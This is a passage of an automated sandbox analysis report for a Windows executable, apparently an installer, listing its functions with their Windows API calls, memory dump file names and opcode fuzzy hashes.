Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
Instruction ID: 64fae73fcf261b5a29c0697abf595a3f572636c651b32177eb72ec05398ad39b
Opcode Fuzzy Hash: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
Instruction Fuzzy Hash: 39817831D04229DBEF24CFA8D8447ADBBB0FB44305F21816AD856BB2C1C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406905 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
Instruction ID: 51e77fe0f08f8d7ba03d7e1561fc41eb13955110d3fdee4e61b85cd17e52ee3e
Opcode Fuzzy Hash: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
Instruction Fuzzy Hash: C4712371D04229DBEF28CF98C8447ADBBB1FB44305F15806AD806BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406A23 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
Instruction ID: 3517892101dd69bd75e64738494877d03a8317e446f0652336487a17687a2cae
Opcode Fuzzy Hash: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
Instruction Fuzzy Hash: 53712571E04229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281D7789996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040696F Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
Instruction ID: 34c5161cf4e4322df4c522de15ced9ded486b5ca7425d8c28145854c0c0886a7
Opcode Fuzzy Hash: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
Instruction Fuzzy Hash: 29714571D04229DBEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004022B2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062DD: FindFirstFileA.KERNELBASE(751D3410,00421558,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
Part of subcall function 004062DD: FindClose.KERNEL32(00000000), ref: 004062F4

lstrlenA.KERNEL32 ref: 004022F2
lstrlenA.KERNEL32(00000000), ref: 004022FC
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
Instruction ID: e190a191dd6904399be212acf1c509ba618b837bf102c15a3da6bfbe2c681905
Opcode Fuzzy Hash: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
Instruction Fuzzy Hash: E6112A71E04318AACB00EFB98949A8EBBB9EF04318F10407BA405FB2D2D6BCD540CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040254C Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402591
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,00000011,00000002), ref: 004025A9

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
Instruction ID: 35fd857a3e442691b1a787247be78dd7b49a46040516f967143c2ea575d22cfd
Opcode Fuzzy Hash: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
Instruction Fuzzy Hash: 5801B1B1905204FFE7119F659E89ABF7ABCEB40344F10443EF402B62C0D6B85E019669

Uniqueness

Uniqueness Score: -1.00%

Function 004024DA Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040250A
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,00000011,00000002), ref: 004025A9

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
Instruction ID: 8f3c8c2c6778634c6bf67ed2425ae169c6cf17cae75ec7db2a606e7394f4df6a
Opcode Fuzzy Hash: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
Instruction Fuzzy Hash: 36118F71905205FEDB11CF64CA5D5AEBAB4AF15344F60447FE042B62C0D2B88A45DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
Instruction ID: 3754a530b6758dc8908f2ef617aa9c280200ea706ec51d0fb7e67c491179f4d9
Opcode Fuzzy Hash: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
Instruction Fuzzy Hash: A3012831724210ABE7294B389D04B2A369CE710328F11823BF811F72F1D6B8DC02DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 004023E8 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402409
RegCloseKey.ADVAPI32(00000000), ref: 00402412

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
Instruction ID: ce1450a8ab12a7957634bce685e0bfb7e2b45ee5234afc219fd3c41b35330c67
Opcode Fuzzy Hash: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
Instruction Fuzzy Hash: AAF0F672E04120ABD700AFB89B4DAAE72A89B44304F11017BF202B72C1D5F85E02826E

Uniqueness

Uniqueness Score: -1.00%

Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
Instruction ID: 79d5ad403a5aaaf22ef605bc71de2bbac2c7999a6642915e38ea97ae4a47edd5
Opcode Fuzzy Hash: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
Instruction Fuzzy Hash: BAF0A771B09240EBCB21DF759D44A9F7FE8EF91354B10803BE145F6290D2388901CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E8F Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EAD
EnableWindow.USER32(00000000,00000000), ref: 00401EB8

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
Instruction ID: ea2ebfb6392eb1d35c1d77cf7a204b1acfca181ccf64587d83a13520139c7bad
Opcode Fuzzy Hash: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
Instruction Fuzzy Hash: C8E012B2A08210DFD715DFA8AA859AE77B4FB84325F10493BE102F12D1D7B85940965D

Uniqueness

Uniqueness Score: -1.00%

Function 00406372 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
GetProcAddress.KERNEL32(00000000,?), ref: 0040639F

Part of subcall function 00406304: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
Part of subcall function 00406304: wsprintfA.USER32 ref: 00406354
Part of subcall function 00406304: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
Instruction ID: 5c1bd2d9329a739c8a877d318ed38f6c7ac4115b407851283e1fe7e546b0050a
Opcode Fuzzy Hash: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
Instruction Fuzzy Hash: 85E08C32A08210ABD7106B709D0493B72E89B85700302483EFE0AF2191D738EC21AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405B73 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 00405B77
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16

Uniqueness

Uniqueness Score: -1.00%

Function 00405644 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403228,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040564A
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405658

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction ID: fc3bbe6b068c7ca676e2af9f6a434936c7df2cd1c21a2d5f2b74ac8b5b27fed5
Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction Fuzzy Hash: 0BC08C30688101AADA002B308D08B073A55AB20340F608836600AE00F0CA32A600DD3F

Uniqueness

Uniqueness Score: -1.00%

Function 6EC02A38 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000), ref: 6EC02AF7

Memory Dump Source

Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true

Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 09516d26107ce9cb400688d6f09b61870b881af300f14b22321d9b88c7e7cbe1
Instruction ID: 5532a4d45eefe350ad6adb22008fba38bef99c9473150db771748cdbe6536fb2
Opcode Fuzzy Hash: 09516d26107ce9cb400688d6f09b61870b881af300f14b22321d9b88c7e7cbe1
Instruction Fuzzy Hash: 1B416E72504604DFDF289FE4D9A0B9A377CFB5531CF218C29E505E7106E7379A928BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00402631 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

